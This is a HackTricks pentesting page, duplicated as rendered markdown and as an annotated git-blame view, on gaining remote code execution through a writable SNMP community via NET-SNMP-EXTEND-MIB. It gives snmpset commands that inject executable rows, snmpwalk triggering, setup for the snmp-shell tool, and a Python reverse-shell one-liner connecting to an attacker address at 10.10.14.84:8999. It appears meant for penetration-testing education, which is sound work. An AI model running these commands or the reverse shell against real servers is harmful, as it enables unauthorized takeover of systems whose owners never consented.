hacktricks/network-services-pentesting/pentesting-snmp/snmp-rce.md



<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

# SNMP RCE

SNMP can be exploited by an attacker if the administrator overlooks its default configuration on the device or server. By **abusing SNMP community with write permissions (rwcommunity)** on a Linux operating system, the attacker can execute commands on the server.

## Extending Services with Additional Commands

To extend SNMP services and add extra commands, it is possible to append new **rows to the "nsExtendObjects" table**. This can be achieved by using the `snmpset` command and providing the necessary parameters, including the absolute path to the executable and the command to be executed:

```bash
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'
```

## Injecting Commands for Execution

Injecting commands to run on the SNMP service requires the existence and executability of the called binary/script. The **`NET-SNMP-EXTEND-MIB`** mandates providing the absolute path to the executable.

To confirm the execution of the injected command, the `snmpwalk` command can be used to enumerate the SNMP service. The **output will display the command and its associated details**, including the absolute path:
```bash
snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects
```

## Running the Injected Commands

When the **injected command is read, it is executed**. This behavior is known as **`run-on-read()`** The execution of the command can be observed during the snmpwalk read.

### Gaining Server Shell with SNMP

To gain control over the server and obtain a server shell, a python script developed by mxrch can be utilized from [**https://github.com/mxrch/snmp-shell.git**](https://github.com/mxrch/snmp-shell.git).

Alternatively, a reverse shell can be manually created by injecting a specific command into SNMP. This command, triggered by the snmpwalk, establishes a reverse shell connection to the attacker's machine, enabling control over the victim machine.
You can install the pre-requisite to run this:

```bash
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
```

Or a reverse shell: 

```bash
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
```

## References
* [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)


<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

arte 2024-01-08 12:25:09 +01:00			`<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-08 12:25:09 +01:00			`Other ways to support HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-08 12:25:09 +01:00			`* If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
a 2024-02-09 08:15:24 +01:00			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
arte 2024-01-08 12:25:09 +01:00			`* Share your hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

a 2024-02-03 17:02:14 +01:00			`# SNMP RCE`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-02-03 17:02:14 +01:00			`SNMP can be exploited by an attacker if the administrator overlooks its default configuration on the device or server. By abusing SNMP community with write permissions (rwcommunity) on a Linux operating system, the attacker can execute commands on the server.`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			`## Extending Services with Additional Commands`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			To extend SNMP services and add extra commands, it is possible to append new rows to the "nsExtendObjects" table. This can be achieved by using the `snmpset` command and providing the necessary parameters, including the absolute path to the executable and the command to be executed:
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
			```bash
			`snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \`
			`'nsExtendStatus."evilcommand"' = createAndGo \`
			`'nsExtendCommand."evilcommand"' = /bin/echo \`
			`'nsExtendArgs."evilcommand"' = 'hello world'`
			```

a 2024-02-03 17:02:14 +01:00			`## Injecting Commands for Execution`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			Injecting commands to run on the SNMP service requires the existence and executability of the called binary/script. The `NET-SNMP-EXTEND-MIB` mandates providing the absolute path to the executable.
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			To confirm the execution of the injected command, the `snmpwalk` command can be used to enumerate the SNMP service. The output will display the command and its associated details, including the absolute path:
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00			```bash
			`snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects`
			```

a 2024-02-03 17:02:14 +01:00			`## Running the Injected Commands`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			When the injected command is read, it is executed. This behavior is known as `run-on-read()` The execution of the command can be observed during the snmpwalk read.
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			`### Gaining Server Shell with SNMP`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			`To gain control over the server and obtain a server shell, a python script developed by mxrch can be utilized from [https://github.com/mxrch/snmp-shell.git](https://github.com/mxrch/snmp-shell.git).`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
a 2024-02-03 17:02:14 +01:00			`Alternatively, a reverse shell can be manually created by injecting a specific command into SNMP. This command, triggered by the snmpwalk, establishes a reverse shell connection to the attacker's machine, enabling control over the victim machine.`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00			`You can install the pre-requisite to run this:`

			```bash
			`sudo apt install snmp snmp-mibs-downloader rlwrap -y`
			`git clone https://github.com/mxrch/snmp-shell`
			`cd snmp-shell`
			`sudo python3 -m pip install -r requirements.txt`
			```

a 2024-02-03 17:02:14 +01:00			`Or a reverse shell:`
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
			```bash
			`snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'`
			```

a 2024-02-08 04:08:28 +01:00			`## References`
a 2024-02-03 17:02:14 +01:00			`* [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

arte 2024-01-08 12:25:09 +01:00			`<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-08 12:25:09 +01:00			`Other ways to support HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
arte 2024-01-08 12:25:09 +01:00			`* If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop)!`
			`* Get the [official PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Discover [The PEASS Family](https://opensea.io/collection/the-peass-family), our collection of exclusive [NFTs](https://opensea.io/collection/the-peass-family)`
a 2024-02-09 08:15:24 +01:00			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
arte 2024-01-08 12:25:09 +01:00			`* Share your hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`